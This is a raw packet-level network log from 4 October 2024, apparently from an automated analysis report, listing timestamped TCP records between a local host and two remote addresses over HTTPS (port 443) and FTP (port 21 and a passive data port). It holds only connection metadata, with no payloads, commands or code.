Oct 4, 2024 10:41:27.101006031 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101020098 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101039886 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101052046 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101063013 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101068974 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101118088 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101118088 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101129055 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101139069 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101191998 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101191998 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.101202965 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101226091 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.101264954 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.114176989 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.114197969 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.155905962 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.155982971 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.156069994 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.156347990 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.156366110 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.678678036 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.681572914 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.681624889 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.051418066 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.051454067 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.051512957 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.051554918 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.100161076 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.264444113 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.264465094 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.264539957 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.264635086 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.264645100 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.264702082 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.265039921 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.265108109 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.265218973 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.265281916 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.269438982 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.269512892 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.270745039 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.270817995 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.271944046 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.272043943 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.272365093 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.272437096 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.274283886 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.274358034 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.275070906 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.275134087 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.275648117 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.275716066 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.276294947 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.276356936 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.277225971 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.277288914 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.277745008 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.277812958 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.277900934 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.277985096 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.278814077 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.278882027 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.279988050 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.280055046 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.280123949 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.280181885 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.280581951 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.280639887 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.280831099 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.280901909 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.281001091 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.281063080 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.281352043 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.281414032 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.281611919 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.281681061 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.281806946 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.281864882 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.283863068 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.283930063 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.284038067 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.284102917 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.284193039 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.284250975 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.285147905 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.285207987 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.285336018 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.285399914 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.285567045 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.285628080 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.286854982 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.286917925 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287086010 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287148952 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287524939 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287569046 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287607908 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287617922 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287642002 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287669897 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287697077 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287755966 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.287868023 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.287929058 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288042068 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.288110018 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288248062 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.288311005 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288434029 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.288500071 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288566113 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.288625002 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288789988 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.288861990 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.288985968 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289050102 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.289159060 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289227009 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.289314032 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289376974 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.289489985 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289549112 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.289644003 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289705992 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.289797068 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.289854050 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290021896 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.290090084 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290208101 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.290266037 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290417910 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.290479898 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290574074 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.290635109 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290796995 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.290854931 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.290956020 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.291016102 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.291202068 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.291265011 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306310892 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306374073 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306406975 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306478024 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306505919 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306513071 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306536913 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306550026 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306576014 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306596994 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306735992 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306796074 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306797981 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.306809902 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.306854010 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.349562883 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.349667072 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.372500896 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.372579098 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.372618914 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.372735023 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.372803926 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373137951 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373181105 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373209953 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373219013 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373378038 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373395920 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373403072 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373465061 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373640060 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373701096 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.373867989 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.373929024 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.374039888 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.374105930 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.374216080 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.374278069 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.374418974 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.374475002 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.374542952 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.374599934 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.397134066 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.397217989 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.397233009 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.397294044 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.397581100 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.397665977 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.397775888 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.397845030 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.440037012 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.440156937 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.464150906 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.464245081 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.464368105 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.464433908 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.464626074 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.464690924 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.464854956 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.464919090 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.464986086 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465043068 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.465220928 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465277910 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.465403080 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465476036 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.465564013 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465635061 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.465749025 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465818882 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.465871096 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.465935946 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.466031075 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.466097116 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.488142014 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.488228083 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.488276958 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.488337994 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.488418102 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.488472939 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.488614082 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.488678932 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.530674934 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.530765057 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.554747105 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.554828882 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.555017948 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.555083990 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.555217028 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.555293083 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.555397987 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.555468082 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.555618048 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.555691957 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.555773973 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.555840969 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.556045055 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.556114912 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.556262970 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.556330919 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.556466103 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.556521893 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.556617975 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.556682110 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.556797028 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.556869030 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.578320026 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.578394890 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.578583956 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.578654051 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.578840017 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.578902960 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.579037905 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.579098940 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.579202890 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.579260111 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.621623993 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.621720076 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.645525932 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.645610094 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.645684004 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.645735979 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.645802975 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.645864010 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646033049 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646091938 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646230936 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646294117 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646523952 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646576881 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646589994 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646603107 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646625996 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646642923 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.646867990 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.646931887 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.647011995 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.647058010 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.647066116 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.647108078 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.647115946 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.647150993 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.647166967 CEST	443	49775	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:28.647206068 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:28.647520065 CEST	49775	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:31.148955107 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:31.153981924 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:31.154462099 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:31.766683102 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:31.767105103 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:31.772085905 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:31.987329006 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.035418987 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.040713072 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.275590897 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.281505108 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.286575079 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.501310110 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.501475096 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.506544113 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.666590929 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.720915079 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.721080065 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.725867033 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.940625906 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:32.940798044 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:32.945725918 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:33.161684036 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:33.162482023 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:33.168870926 CEST	51014	49812	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:33.168951988 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:33.169028044 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:33.176290989 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:33.785227060 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:33.785792112 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:33.785860062 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:33.834515095 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.084544897 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.693934917 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.827574015 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.827644110 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.827831984 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.827872992 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.828270912 CEST	21	49796	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.828316927 CEST	49796	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:34.828465939 CEST	51014	49812	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.828475952 CEST	51014	49812	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.828484058 CEST	51014	49812	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.829344988 CEST	51014	49812	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:34.829416990 CEST	49812	51014	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:35.043878078 CEST	21	49796	5.2.84.236	192.168.2.7
